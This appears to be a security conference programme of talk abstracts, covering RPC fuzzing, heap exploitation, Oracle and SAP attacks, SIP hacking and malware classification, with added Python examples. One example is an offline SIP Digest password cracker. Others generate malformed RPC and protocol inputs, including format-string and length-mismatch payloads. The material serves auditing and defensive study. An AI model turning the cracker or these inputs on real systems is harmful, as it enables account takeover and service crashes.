RPC Auditing Tools and Techniques

Aaron Portnoy, Cody Pierce, TippingPoint Security Research Team
RPC auditing is currently a tedious and manual process. When complex embedded structures, arrays, and unions are present in an IDL, coding the client involves much debugging and time. The discussed tools are the culmination of a few weeks' worth of research by Aaron Portnoy and Cody Pierce that allow a researcher to very quickly communicate with and audit an RPC server. Functionality includes a tool that recursively finds binaries importing RpcServer* functions and runs IDA in batch mode to generate IDBs and IDLs, a lexer and parser that turn the IDL's opcodes, structures, and unions into instantiated, fuzzable Python objects, and an NDR library that defines how the NDR data will be packed for transport.
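As an added illustration of the NDR step (example code written for this page, not the TippingPoint tooling described above; the struct layout, field names and the mutation list are assumptions), the following Python marshals a struct containing a conformant array the way NDR places it on the wire and then emits the length-inconsistent variants an auditor would want the fuzzable objects to produce:

```python
import struct

# NDR transfer syntax primitives: (struct format, size/alignment). Little-endian
# is assumed, as on the Windows RPC servers this kind of audit targets.
PRIMITIVES = {"char": ("<B", 1), "short": ("<H", 2), "long": ("<I", 4), "hyper": ("<Q", 8)}


class NDRStruct:
    """Marshals a struct whose last member may be a conformant array
    ([size_is(count)] elem data[]). Scalar fields are (type, name) tuples;
    the array field is ("carray", name, elem_type, count_field)."""

    def __init__(self, fields):
        self.fields = fields

    @staticmethod
    def _align(buf, n):
        buf.extend(b"\x00" * ((-len(buf)) % n))

    def pack(self, values, max_count=None):
        buf = bytearray()
        # NDR hoists the conformance (the array's maximum count) to the
        # front of the enclosing struct, before any scalar member.
        for f in self.fields:
            if f[0] == "carray":
                n = len(values[f[1]]) if max_count is None else max_count
                buf += struct.pack("<I", n)
        for f in self.fields:
            if f[0] == "carray":
                fmt, size = PRIMITIVES[f[2]]
                self._align(buf, size)
                for elem in values[f[1]]:
                    buf += struct.pack(fmt, elem)
            else:
                fmt, size = PRIMITIVES[f[0]]
                self._align(buf, size)  # scalars are aligned to their own size
                buf += struct.pack(fmt, values[f[1]])
        return bytes(buf)

    def length_cases(self, values):
        """Variants that break the relationship between the conformance
        count, the size_is() member and the bytes actually sent. A server
        that allocates from one of the three and copies according to
        another is the usual find in this kind of audit."""
        arr = next(f for f in self.fields if f[0] == "carray")
        name, count_field = arr[1], arr[3]
        n = len(values[name])
        out = []
        inflated = dict(values, **{count_field: 0x7FFFFFFF})
        out.append(("size_is far larger than data", self.pack(inflated)))
        out.append(("conformance 0xFFFFFFFF, data unchanged", self.pack(values, max_count=0xFFFFFFFF)))
        out.append(("conformance zero, size_is unchanged", self.pack(values, max_count=0)))
        shrunk = dict(values, **{name: values[name][:n // 2]})
        out.append(("data shorter than size_is", self.pack(shrunk)))
        return out


# Constructed example corresponding to this assumed IDL (not from the talk):
#   typedef struct { long id; short flags; long count;
#                    [size_is(count)] char data[]; } FOO;
FOO = NDRStruct([("long", "id"), ("short", "flags"), ("long", "count"),
                 ("carray", "data", "char", "count")])

if __name__ == "__main__":
    sample = {"id": 1, "flags": 2, "count": 3, "data": b"abc"}
    print(FOO.pack(sample).hex())
    for label, blob in FOO.length_cases(sample):
        print(f"{label:45s} {blob.hex()}")
```

On the wire the conformance count, the size_is() member and the number of elements actually sent are three separate numbers; the mutations above deliberately make them disagree, which is exactly the property a hand-written client makes tedious to vary.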
Aaron Portnoy, aka deft, is a researcher within TippingPoint's security research group. His responsibilities include reverse engineering, vulnerability discovery, and tool development. Aaron has discovered critical vulnerabilities affecting a wide range of enterprise vendors including: Microsoft, RSA, McAfee, Citrix, Symantec, Hewlett-Packard, IBM and others. Additionally, Aaron has contributed mind share and code to OpenRCE, PaiMei, and various white papers and books. Cody Pierce, aka intropy, is a researcher within TippingPoint's security research group. His responsibilities include reverse engineering and developing auditing and reverse engineering automation tools. Cody has discovered critical vulnerabilities affecting a wide range of enterprise vendors, including: Microsoft, Hewlett-Packard, America Online, Computer Associates and others. Prior to TippingPoint, Cody was a security researcher for Citadel Security Software responsible for vulnerability analysis, research, and remediation. Though he spends much of his personal and free time in the world of a reverse engineer, Cody's true passion is music.

Windows Heap Protection: Bypassing requires understanding

Dave Aitel, Immunity, Inc.
Introduction
"Heap exploits are dead. Heap exploits remain dead. And we have killed them." Sending a crafted string and getting reliable shellcode execution back in one easy step is now history (in fact it always was). The future of heap exploitation lies not in hoping some magical technique will get us the unlink trick back, but in understanding the heap allocation algorithm itself, crafting a suitable heap layout during the different phases of exploitation, and taking advantage of structures supplied by the server itself. There is no generic way to do this, but tools will be presented to relieve the pain of manual analysis and help exploit developers understand and exploit the wildness of the heap.
Abstract
The presentation discusses heap overflow protection mechanisms on the Windows operating system, and the weakness of existing techniques that try to bypass these protections. A methodology for understanding and manipulating heap layouts during different phases of exploitation will be shown, supported by a series of tools written specifically for this task. The presentation will explore the various techniques and tools available to the researcher, including heap fuzzing, fingerprinting, data recognition and memory leaks, enabling the researcher to craft a reliable heap layout and overflow his way to shellcode execution.

Oracle Security: Orasploit

Alexander Kornbrust, Red Database Security
Orasploit is an Oracle exploit framework which automatically exploits vulnerabilities in Oracle databases. With orasploit it is possible to exploit an unprotected or unpatched database. Orasploit supports various exploits, privilege escalation techniques and many different payloads. We show different possibilities to create, write and read files, to cause denial of service, and new ways to send data via HTTP requests from the database. It is possible to extend orasploit with your own custom exploits.
Alexander Kornbrust is the founder and CEO of Red-Database-Security GmbH, a company specialized in Oracle security. Red-Database-Security is one of the leading companies in Oracle security. He is responsible for Oracle security audits and Oracle anti-hacker trainings and has given various presentations at security conferences such as Black Hat, BlueHat and IT Underground. Alexander Kornbrust has worked with Oracle products as an Oracle DBA and Oracle developer since 1992. During the last six years, Alexander has found over 220 security bugs in different Oracle products.

Naked Security : The State of the Application Security Industry

Mark Curphey, Microsoft
If you follow the popular press you may think that the only thing to worry about if you build software is Cross-Site Scripting or be convinced that for a few thousand dollars you could buy a shiny red button and the problems of insecure software would go away. In this presentation Mark Curphey will dissect the state of the application security industry including the current state of tools, technologies and shared knowledge. As an evening talk expect a little bit of humour!
Mark Curphey heads up Microsoft's ACE Team in Europe. He ran Foundstone from 2004 to 2006, was Director of Software Security at Charles Schwab in San Francisco and started OWASP way back when. He has a Master's degree in Information Security (cryptography) from Royal Holloway in London. Royal Holloway is recently famous as the cryptography school where the cryptographer Sophie Neveu was educated in the bestselling novel "The Da Vinci Code". His blog (http://www.securitybuddha.com) is recommended reading for professional development by the RSA Conference Committee.

Browser Hijacking

Daniel Fabian, SEC Consult
Current XSS attacks make use of the document object model to steal session credentials from unsuspecting users, allowing the attacker to impersonate his victim. Well-known attacks also include relogin trojans and keyloggers. These attacks work well in some environments, but are not really suited for complex applications such as online banking systems, where individual TAN codes are needed to complete a transaction. This talk introduces Trabbler, the first highly versatile "cross site scripting Trojan". Once injected via XSS, Trabbler takes control of the victim's current session, allowing the attacker to watch and manipulate the victim's actions on the vulnerable website. During the hijacking attack, instances of Trabbler communicate with a central control server, which gives it botnet-like capabilities. Trabbler's design is modular, meaning custom script modules can be downloaded to the infected browser. This makes it useful for very specific attacks, e.g. manipulating a transaction during execution. Other modules include a keylogger and a browser camera, which allows the attacker to watch his victim's actions in real time. In the talk, we will discuss Trabbler's architecture and code and give practical examples of its application.
Daniel Fabian has been working as a security consultant for SEC Consult GmbH for several years. His job includes conducting penetration tests and code reviews for Austrian and German banks and other major customers. As chief of security research he also manages the company's vulnerability research activities.

Practical VOIP/SIP Hacking

Klaus Darilion, nic.at/enum.at
This training teaches you how to hack typical SIP provider setups. For this, we take a look at SIP and analyze weak points, which will be our potential points of attack. We further take a look at the most used SIP products (ser/openser, Asterisk, Cisco gateways). These products can be operated in a secure way when configured properly, but often service providers do not know about the potential weaknesses, thus giving hackers a chance. Typical hacking goals are:
- authentication bypass
- achieving free calling
- DoS attacks against the VoIP service
- identity spoofing
The training will be split into a theoretical part and a practical part. The theoretical part will teach the relevant details of the SIP protocol and the potential attack scenarios. The practical part shows how to detect vulnerabilities and presents tools to ease hacking. The hacking is done against a virtual SIP service provider (a SIP proxy and a gateway in a typical SIP provider setup).
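An added example of the first and last goals in that list, authentication bypass through offline cracking of captured Digest credentials and identity spoofing through a From header the proxy never ties to the authenticated user (example code written for this page, not part of the training material; the realm, user names, nonce and password are constructed):

```python
import hashlib
import re

# SIP (RFC 3261) reuses HTTP Digest authentication (RFC 2617). Everything a
# REGISTER exposes to a sniffer is enough to brute-force the password offline.


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(user, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """RFC 2617 response: MD5(HA1:nonce[:nc:cnonce:qop]:HA2)."""
    ha1 = md5hex(f"{user}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    if qop:
        return md5hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")


def build_capture(user, password, from_user=None, nonce="4b3f2c1a"):
    """Constructed REGISTER as a sniffer would see it. from_user != user
    models identity spoofing: valid credentials for one account, but the
    From header claims another subscriber's address of record."""
    realm, uri = "sip.example.org", "sip:sip.example.org"
    resp = digest_response(user, realm, password, "REGISTER", uri, nonce)
    aor = from_user or user
    return (f"REGISTER {uri} SIP/2.0\r\n"
            f"From: <sip:{aor}@{realm}>;tag=1\r\n"
            f"To: <sip:{aor}@{realm}>\r\n"
            f'Authorization: Digest username="{user}", realm="{realm}", '
            f'nonce="{nonce}", uri="{uri}", response="{resp}", algorithm=MD5\r\n\r\n')


def parse_authorization(request):
    method = request.split(" ", 1)[0]
    hdr = re.search(r"^Authorization:\s*Digest\s+(.*)$", request, re.M).group(1).strip()
    params = {k: v for k, _q, v in re.findall(r'(\w+)=("?)([^",]*)\2', hdr)}
    params["method"] = method
    return params


def crack(params, wordlist):
    """Offline dictionary attack: nonce, uri and response are all in the
    capture, so each candidate costs two MD5s and generates no traffic."""
    for pw in wordlist:
        guess = digest_response(params["username"], params["realm"], pw,
                                params["method"], params["uri"], params["nonce"],
                                params.get("qop"), params.get("nc"), params.get("cnonce"))
        if guess == params["response"]:
            return pw
    return None


def spoofed_identity(request, params):
    """The check a proxy must make and often does not: the authenticated
    username must own the address of record in From. Otherwise any valid
    account can register or place calls as any other user."""
    m = re.search(r"^From:.*?sip:([^@>]+)@", request, re.M)
    return m is not None and m.group(1) != params["username"]


if __name__ == "__main__":
    cap = build_capture("1001", "s3cret")
    p = parse_authorization(cap)
    print("cracked:", crack(p, ["1234", "password", "s3cret"]))
    spoof = build_capture("1001", "s3cret", from_user="1002")
    print("spoofed From:", spoofed_identity(spoof, parse_authorization(spoof)))
```

The dictionary attack works because Digest without TLS is only as strong as the password and the proxy's nonce handling; the From check is the configuration-level fix the abstract alludes to when it says the products are secure only when configured properly.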
Klaus Darilion is an expert in the field of SIP-based communications. He studied electrical engineering at the Vienna University of Technology, where he later wrote a doctoral thesis about SIP-based voice communication for public safety applications. Klaus Darilion is now employed with enum.at, the Austrian ENUM registry, where he works in the fields of ENUM-based call routing and all kinds of SIP-based communication. This involves standardization in national and international working groups such as the IETF SPEERMINT group. Currently he is working on security reviews of VoIP provider infrastructure. Besides all the theoretical work, Klaus Darilion has also gained practical experience as a user and developer of the open source SIP proxies ser and openser.

A Discussion on Memory-Resident Backdoors in Oracle

David Litchfield, x
Oracle "rootkits", in other words backdoors, have been discussed in the past but none that merit any serious concern. So far, those that have been presented are simple and trivial to spot. This presentation will look at memory-resident backdoors that are considerably harder to find, delivery mechanisms and potential defences. A working example will be demonstrated.
David Litchfield specializes in searching for new threats to database systems and web applications. He has lectured to both British and U.S. government security agencies on database security and is a regular speaker at the Blackhat Security Briefings. He is a co-author of "The Database Hacker's Handbook", "The Shellcoder's Handbook", "SQL Server Security", and "Special Ops". In his spare time he is the Managing Director of Next Generation Security Software Ltd.

Breaking and Securing Web Applications

Nitesh Dhanjani, none
The application layer exposes an organization to a huge attack surface. A single coding error within millions of lines of code can spell disaster for an organization. Security products and consultants are trying hard to keep up with the new attack vectors, but so are the attackers. Few security vendors will admit to the class of vulnerabilities that cannot be scanned, parsed, or fuzzed for. There are categories of extremely high-risk vulnerabilities that continue to plague web applications because organizations do not realize the root cause of these vulnerabilities, while commercial product vendors continue to promise a one-click-and-scan solution. This talk will focus on the discussion of high-risk vulnerabilities that plague web applications today, including the following: Cross Site Scripting (XSS), Cross Site Request Forgery (XSRF), (anti) DNS pinning, browser plugin hijacking, and more. This talk will also discuss how these vulnerabilities can be abused by an external entity to launch attacks against a company's internal network. These attacks are lethal because they can abuse a legitimate user's browser to act as a proxy between the attacker and the company's internal network. In other words, stop believing the security vendor hype. Your applications are more vulnerable than ever before, it has become much harder to secure them, and your 'enterprise' crown jewels are most likely hanging out in the open.
Nitesh Dhanjani is the author of "Network Security Tools: Writing, Hacking, and Modifying Security Tools (O'Reilly)" and "HackNotes: Linux and Unix Security (Osborne McGraw-Hill)". Nitesh is currently the Senior Director of Application Security Engineering at a large corporation in the United States. Prior to this, Nitesh was a Manager at the Advanced Security Labs at Ernst & Young LLP. Prior to Ernst & Young, Nitesh was a Senior Consultant at Foundstone where he contributed to and taught Foundstone's "Ultimate Hacking: Expert" and "Ultimate Hacking" security courses. Nitesh has performed hundreds of security assessments, including attack and penetration reviews, source code reviews, and security architecture reviews for many of the Fortune 500 companies. He is also a contributing author to the best-selling security book "Hacking Exposed 4". Nitesh has been invited to talk at various information security conferences including Black Hat, RSA, Hack in the Box, and OSCON. He graduated from Purdue University with both a Bachelor's and a Master's degree in Computer Science.

Carmen, Rogue Web Server

Simon Roses Femerling, Microsoft
Carmen is a unique web server written 100% in Python that covers the gap in web security assessment when a rogue web server is needed. Using Carmen any security expert will be able to audit web browsers, map hosts and networks, study intruder attacks and much more! Carmen brings many interesting features to the game ;)
• Web server simulation (Apache, IIS, etc.): Carmen can simulate well-known web servers, but you can also combine servers' features.
• Fake cookie generation: Carmen has 8 cookie generation methods to confuse / defeat session ID analysis.
• Fake errors: Carmen will display errors from well-known servers and/or you can customize the errors.
• Plugin support: write your own plugins to interact with the servers and handle clients :)
• 100% in Python (open source): Carmen is cross-platform.
• CGI execution: you can create CGI scripts using Python.
• And many more things.
Carmen can be used as:
• Rogue web server.
• Internal network mapping tool.
• Web honeypot (standalone application or together with other tools like honeyd).
• Logging/analyzing/attacking client browsers.
• Pen-tester tool.
• Confusing/testing/attacking scanner tools.
Carmen can be used as an offensive tool to attack browsers, security tools, etc., or as a defensive tool like a web honeypot. You can also write web applications on top of Carmen to make the illusion more real.
Simon Roses Femerling is a Security Technologist at the ACE Team at Microsoft, formerly at PwC and @stake. He has many years of security experience and has authored and cooperated in several open source security projects and advisories. Simon is a native of the wonderful island of Mallorca in the Mediterranean Sea. He holds a postgraduate degree in E-Commerce from Harvard University and a B.S. from Suffolk University in Boston, Massachusetts.

Flash Security Basics

fukami, SektionEins
The lecture will give an overview of the history of Flash/ActionScript, its capabilities, and its object and security model. Common mistakes of developers will be discussed, including an analysis of possible exploits. There will also be a section which introduces free and commercial tools for auditing.

Collecting and Managing Accumulated Malware Automatically

Georg Wicherski, mwcollect.org, EmsiSoft, RWTH Aachen
With the nepenthes platform, we are able to collect malware autonomously. Centrally collecting this malware over months yielded a vast, unmanageable, giant heap of binary data. We show how we eventually managed to do something useful with this data by extracting different information using
- sandboxing
- recording of attacker information
- botnet monitoring
and introduce the functionality of the tools we developed for these means.
Georg Wicherski is a 19-year-old German university student with experience in the fields of botnet tracking and mitigation, malware analysis and network engineering. He co-authored the Honeynet Project's paper "Know Your Enemy: Tracking Botnets" and two papers submitted to ESORICS and the DFN-CERT Workshop. He also published his paper "Medium Interaction Honeypots" on the Internet. Additionally, he presented at Black Hat Asia 2006 and the 23C3. His fields of interest besides malware and botnets include robotics engineering and programming as well as wireless appliances. He is the author of the mwcollectd medium-interaction honeypot and a nepenthes developer. He founded and now leads the mwcollect Alliance, a non-profit organization aiming at collecting malware, with now over 25000 unique in-the-wild samples. <http://www.pixel-house.net/>

Intercepting GSM traffic

Steve, x
This talk is about GSM security. We will explain the security, technology and protocols of a GSM network. We will further present a solution to build a GSM scanner for $900. The last part of the talk focuses on cracking a GSM conversation. http://wiki.thc.org/gsm
An enthusiastic security researcher. Email: Steve at segfault.net

Automated structural classification of malware

Halvar Flake, x
Malware authors are changing: in the past, their motivation was fame, nowadays it is mostly money. With the change of focus, development practices on the side of the malware authors are changing, too: hand-crafted polymorphic assembly code is out, cheap-to-maintain-and-develop C/C++ code is in. Simple 'offline polymorphism' (e.g. a clever recompile with small changes) and targeted attacks allow the evasion of traditional AV signatures without giving up on massive code reuse. To automatically deal with the (almost boringly) growing flood of malware, several classification methods have been proposed, ranging from looking at instruction n-grams and n-perms and other "features" to generate high-dimensional vectors, to behavioral techniques. These techniques suffer from the drawback of high 'brittleness', i.e. they can be easily circumvented without requiring significant skill or time on the side of the malware author. This talk will discuss using structural (e.g. callgraph- and flowgraph-based) metrics for the automated classification of malware into families. The advantage of the discussed approach is its relative 'suppleness': it is resistant up to drastic measures such as 'recompiling a virus for a different architecture' etc. A significant investment of work is needed on the malware author's side to break the analysis. An example implementation of a fully automated malware classification system (VxClass), which automatically unpacks, disassembles, and compares new malware against an existing database, will be discussed, and a number of horribly incorrect predictions about the future will be given.
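To make the structural idea concrete, here is an added toy implementation (written for this page; it is not VxClass and not code from the talk, and the call graphs, flowgraph sizes and the family threshold are constructed) that fingerprints each function by callgraph and flowgraph shape alone and scores two samples with a Dice coefficient over matched fingerprints:

```python
from collections import Counter

# Each constructed "binary" is a call graph plus per-function flowgraph size
# (basic blocks, edges). Function names are deliberately meaningless: the
# comparison never looks at names, addresses or instruction bytes, which is
# why renaming, reordering or recompiling leaves the score untouched.


def fn_signature(g, f):
    """Structural signature of one function: its own flowgraph shape, its
    fan-out and fan-in, and the flowgraph shapes of the functions it calls."""
    blocks, edges = g["flow"][f]
    callees = g["calls"].get(f, [])
    callers = sum(1 for c in g["calls"].values() if f in c)
    neighbourhood = tuple(sorted(g["flow"][c] for c in callees))
    return (blocks, edges, len(callees), callers, neighbourhood)


def fingerprint(g):
    return Counter(fn_signature(g, f) for f in g["flow"])


def similarity(a, b):
    """Dice coefficient over matched signatures: 1.0 means every function in
    a has a structurally identical twin in b and vice versa."""
    fa, fb = fingerprint(a), fingerprint(b)
    shared = sum((fa & fb).values())
    return 2 * shared / (sum(fa.values()) + sum(fb.values()))


def classify(sample, families, threshold=0.7):
    """Assign a sample to the family of its closest known member, or None."""
    best = max(((similarity(sample, m), name) for name, members in families.items()
                for m in members), default=(0.0, None))
    return best[1] if best[0] >= threshold else None


SAMPLE_A = {
    "calls": {"main": ["connect", "encrypt", "send"], "encrypt": ["xor_block"]},
    "flow": {"main": (5, 6), "connect": (3, 3), "encrypt": (4, 4),
             "xor_block": (2, 1), "send": (3, 2)},
}
# Same source recompiled: every symbol renamed and the functions reordered,
# which defeats byte signatures but changes nothing structural.
SAMPLE_A_RECOMPILED = {
    "calls": {"sub_401000": ["sub_4011a0", "sub_401300", "sub_401120"],
              "sub_401120": ["sub_401240"]},
    "flow": {"sub_401300": (3, 2), "sub_4011a0": (3, 3), "sub_401000": (5, 6),
             "sub_401240": (2, 1), "sub_401120": (4, 4)},
}
# A later variant of the same family: one new helper, main grew to call it.
SAMPLE_A_VARIANT = {
    "calls": {"main": ["connect", "encrypt", "send", "sleep_jitter"],
              "encrypt": ["xor_block"]},
    "flow": {"main": (6, 8), "connect": (3, 3), "encrypt": (4, 4),
             "xor_block": (2, 1), "send": (3, 2), "sleep_jitter": (2, 1)},
}
SAMPLE_UNRELATED = {
    "calls": {"main": ["parse"]},
    "flow": {"main": (2, 1), "parse": (7, 9)},
}

if __name__ == "__main__":
    families = {"fam_a": [SAMPLE_A]}
    for name, s in [("recompiled", SAMPLE_A_RECOMPILED),
                    ("variant", SAMPLE_A_VARIANT), ("unrelated", SAMPLE_UNRELATED)]:
        print(f"{name:11s} sim={similarity(SAMPLE_A, s):.2f} -> {classify(s, families)}")
```

Note the caveat the toy exposes: two tiny leaf functions with the same shape (here xor_block and sleep_jitter) are indistinguishable to a purely structural signature, which is why real implementations weight small functions less or hash a larger neighbourhood.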
Originating in the fields of copy protection and digital rights management, he gravitated more and more towards network security over time as he realized that constructive copy protection is more or less fighting windmills. After writing his first few exploits he was hooked and realized that reverse engineering experience is a very handy asset when dealing with COTS software. With extensive experience in reverse engineering, network security, penetration testing, and exploit development, Halvar consults on reverse engineering and is a graduate student of mathematics in Germany.

Destructive Data - Designing Inputs That Make Software Fail

Heikki Kortti, Codenomicon Ltd
What makes software fail? This talk describes techniques for creating effective malicious inputs designed to break network protocol and file format implementations. We look at the categories of destructive data, map them to practical examples taken from common network protocols and file formats, and analyze past vulnerabilities that could be triggered by these inputs. For selected vulnerabilities, we look at source code to understand how the malicious inputs reach the problematic portions of code and how each vulnerability is ultimately triggered. The analyzed interfaces include both wired and wireless protocols as well as various file formats including images, video and compression formats and X.509 certificates. We observe that only a few relatively simple insights, combined with a solid knowledge of common categories of data structures, already help break most implementations through rigorous negative black-box testing. From a proactive perspective, understanding what kinds of inputs typically trigger common programming errors also helps developers protect against attacks and avoid the most common problems.
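An added example (written for this page, not taken from Codenomicon's test suites; the record format and the case lists are constructed) that generates destructive inputs for a length-prefixed record in the categories the abstract names, then runs them against a parser that trusts the length field and one that checks every relationship the first one assumes:

```python
import struct

# Target format (constructed): a record is a big-endian uint16 length followed
# by that many payload bytes. Three categories of destructive data are covered:
# integer boundaries on the length, hostile string content, and damage to the
# framing itself.

INT16_BOUNDARIES = [0, 1, 0x7F, 0x80, 0xFF, 0x100, 0x7FFF, 0x8000, 0xFFFE, 0xFFFF]

STRING_CLASSES = {
    "overlong": b"A" * 4096,                 # buffers sized for "normal" names
    "format": b"%s%n%x" * 32,                # printf-style sinks
    "embedded_nul": b"ok\x00hidden",         # C string vs counted string confusion
    "high_bit": bytes(range(0x80, 0x100)),   # signed char and charset handling
    "empty": b"",                            # off-by-one on zero length
}


def build_record(length, payload):
    return struct.pack(">H", length) + payload


def destructive_cases(valid_payload=b"hello"):
    cases = []
    # Length boundaries with the body left at its valid size, so declared and
    # actual lengths disagree.
    for n in INT16_BOUNDARIES:
        cases.append((f"length={n:#06x} body={len(valid_payload)}",
                      build_record(n, valid_payload)))
    # Content classes with a self-consistent length, to reach the code that
    # runs after the framing check passes.
    for name, body in STRING_CLASSES.items():
        cases.append((f"payload={name}", build_record(len(body), body)))
    valid = build_record(len(valid_payload), valid_payload)
    cases.append(("truncated header", valid[:1]))
    cases.append(("trailing garbage", valid + b"\xff" * 8))
    return cases


def parse_record_naive(data):
    """Trusts the length field the way memcpy(dst, p + 2, n) in a C parser
    would. In Python the slice silently shortens; in C the same trust is an
    over-read of the packet or an overflow of dst."""
    (n,) = struct.unpack(">H", data[:2])
    return data[2:2 + n]


def parse_record_strict(data):
    """Rejects every inconsistency the naive parser assumes away."""
    if len(data) < 2:
        raise ValueError("short header")
    (n,) = struct.unpack(">H", data[:2])
    if len(data) - 2 < n:
        raise ValueError("declared length exceeds available data")
    if len(data) - 2 > n:
        raise ValueError("trailing bytes after record")
    body = data[2:2 + n]
    if b"\x00" in body:
        raise ValueError("embedded NUL in payload")
    return body


def run_campaign(parser, cases):
    """Black-box tally: ValueError is the parser rejecting input on purpose;
    any other exception escaping is the kind of failure a fuzzer logs."""
    tally = {"accepted": 0, "rejected": 0, "crashed": 0}
    for _label, blob in cases:
        try:
            parser(blob)
            tally["accepted"] += 1
        except ValueError:
            tally["rejected"] += 1
        except Exception:
            tally["crashed"] += 1
    return tally


if __name__ == "__main__":
    cases = destructive_cases()
    print("naive :", run_campaign(parse_record_naive, cases))
    print("strict:", run_campaign(parse_record_strict, cases))
```

The interesting number is not the one crash but the sixteen silent acceptances by the naive parser: a declared length of 0xFFFF over a five-byte body is exactly the input that becomes an out-of-bounds copy once the same logic is written in C.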
Heikki Kortti is a Robustness Specialist at Codenomicon Ltd. With a background in network and systems administration, he has been working with information security since 1993. At his present job at Codenomicon, he has developed security testing suites for protocols such as BGP4, DNS, SMTP, IMAP, and POP3, as well as actively participated in the development of tests for more than 130 other protocols and file formats. He has personally witnessed countless network servers, client applications, routers, switches, VoIP equipment, web browsers, operating systems, mobile phones, games systems, media players, virus scanners and firewalls fail and beg for mercy at the purifying altar of automated input testing.

New Security Model of Bluetooth 2.1

Marcel Holtmann, BlueZ Project
The security architecture of Bluetooth changes a lot with the upcoming Bluetooth 2.1 specification. This presentation will probably be one of the first that shows it and gives details of its inner workings.
- Old Bluetooth security architecture
- New Bluetooth security architecture
- What has changed (for better or worse)
- Does it really improve security, or is it only about usability?
Marcel Holtmann is the maintainer and the core developer of the official Linux Bluetooth stack which is called BlueZ. He started working with the Bluetooth technology back in 2001. His work includes new hardware drivers, upper layer protocol implementations and the integration of Bluetooth into other subsystems of the Linux kernel.

Reasonable Disclosure

Jeff Moss, Founder & Director, Blackhat

Securing Networked Infrastructure through Seven Layers of Insecurity

Michael Kafka, René Pfeiffer, self employed
The training addresses the basics of security from the viewpoint of the network and networked applications. It covers every layer of the OSI model present in typical networked environments and explores attack vectors and remedies alike. We furthermore classify potential attackers in order to present a detailed view of the adversaries. We have prepared a lab environment that can be used for demonstrations throughout the training. Participants can safely try attack methods at this virtual shooting range.
René Pfeiffer was born in 1972 and studied physics at the Universities of Gießen and Vienna. He turned to professional system administration and software development and has been working in this field for over 10 years, most of the time as a freelance consultant. He has taught computer security at the Technikum Wien since 2001. Michael Kafka has been working as a trainer and consultant for networking and security for over 10 years. He is a Cisco-certified trainer and has a lot of experience designing workshops and lectures.

Fuzzing and Exploiting Wireless Drivers

Sylvester Keil / Clemens Kolbitsch, Vienna University of Technology, Sec Consult
This paper documents the process of identifying potential vulnerabilities in IEEE 802.11 device drivers through fuzzing. The relative complexity of 802.11 compared to other layer-two protocols imposes a number of non-trivial requirements on regular 802.11 protocol fuzzers. This paper describes a new approach to fuzzing 802.11 device drivers on the basis of emulation. First, the process of creating a virtual 802.11 device for the processor emulator QEMU is described. Then, the development of a stateful 802.11 fuzzer based on the virtual device is discussed. Finally, we report the results of fuzzing the Atheros Windows XP driver, as well as the official and open source MADWifi drivers. Furthermore, to document the process of exploiting 802.11 wireless device driver vulnerabilities, the issues of executing arbitrary code in kernel mode on Linux and Windows systems will be addressed as well. We will present a Metasploit exploit implementation similar to the stager approach taken in Metasploit's Windows kernel-mode exploits.
Clemens Kolbitsch is currently finishing his master's studies ("Software Engineering and Internet Computing") at the Technical University in Vienna, Austria. His main research is computer security with a special interest in memory management and virtual machines. Sylvester Keil is also finishing his master's studies ("Software Engineering and Internet Computing") at the Technical University in Vienna, Austria. Besides their research into wireless 802.11 vulnerability detection, they are currently working on Linux kernel-mode exploitation techniques, both supported by SEC Consult Unternehmensberatung GmbH.

Audit of the RFID ePassport and the concepts

Lukas Grunwald, Neo Catena Networks Inc.
After some introduction to the RFID technology and security risks, a deep technical overview of the risks and audit methodology will be given.
Lukas Grunwald is the CTO of DN-Systems Enterprise Internet Solutions GmbH (Hildesheim/Germany), a globally acting consulting office working mainly in the fields of security, identity, internet/eCommerce and Supply Council solutions for enterprises. He is one of the founders of Neo Catena Networks Inc. in California as well. Mr. Grunwald has been working in the field of IT security for nearly 15 years now. He specializes in the security of wireless and wired data and communication networks, forensic analysis, audits and active networking. Mr. Grunwald regularly publishes articles, talks and press releases for specialist publications. He also participates actively in conferences such as Hackers at Large, Hacking in Progress, Network World, Internet World, Linux World (USA/Europe), Linux Day Luxembourg, LinuxTag, CeBIT and Black Hat Briefings.

SAP (In)Security

Mariano Nuñez Di Croce, CYBSEC
This training is aimed at diving into the world of SAP security. You will learn which are the key security components of SAP systems, covering all their aspects:
- Security of the Operating System
- Security of the Database Server
- Security of SAP R/3:
- Transport System security
- User management and administration
- Communication security
- Connectivity security
- System upgrade and patching
- Logs and auditing
- Attacking a SAP system
- sapyto
I have been working as a security consultant for CYBSEC for the last 3 years, focused on Penetration Testing and Vulnerability Research. I have discovered critical vulnerabilities in Microsoft, SAP and several security products. I am the developer of sapyto, the first public framework to carry out Penetration Tests over SAP systems. I have spoken at many security conferences in Latin & Central America and recently at Blackhat.

Attacking the Giants: Exploiting SAP Internals

Mariano Nuñez Di Croce, CYBSEC
The SAP Remote Function Call (RFC) interface is the heart of communications between SAP systems, and between SAP and external software. Almost every system that wants to interact with SAP does so using the RFC interface. As stated by SAP: "The RFC library is the most commonly used and installed component of existing SAP software". After a short description of the RFC interface's purpose and internals, our presentation will describe vulnerabilities discovered in our research, both in the RFC protocol implementation and in the RFC library itself. Besides these vulnerabilities, we will be disclosing new vulnerabilities in other related SAP key components. Beyond this, we will be presenting different attacks abusing default misconfigurations and design flaws. These attacks will let you:
- Grab logon credentials.
- Hijack RFC communications.
- Perform man-in-the-middle attacks over RFC.
- COMPLETELY OWN a SAP Application Server, remotely.
All these attacks will be demonstrated live with the help of sapyto, the first public framework for penetration testing of SAP systems. This tool enables penetration testers to assess the security of SAP systems. It can perform harmless security audits, but also active exploitation of discovered flaws. The stable version of sapyto will be released, shipped with many new plugins.
I have been working as a security consultant for CYBSEC for the last 3.5 years, focused on Penetration Testing and Vulnerability Research. In penetration testing, I have analysed critical national and international systems and applications. As for vulnerability research, I have discovered critical vulnerabilities in Microsoft, SAP and several security products. I am the developer of sapyto, the first public framework to carry out Penetration Tests over SAP systems. I have spoken at many security conferences in Latin & Central America and recently at Blackhat.

The Three Faces of CSRF

Martin Johns, University of Hamburg
Even though Cross Site Request Forgery (CSRF) vulnerabilities have made it into the OWASP Top 10 [1], this vulnerability class is still often ignored and almost always belittled. While in 2006 alone 1282 XSS vulnerabilities were collected by the CWE project, only 5 (!) CSRF issues were recorded in the same timeframe [2]. This talk will discuss the various existing CSRF attack vectors and exemplify the issues with real-world examples:
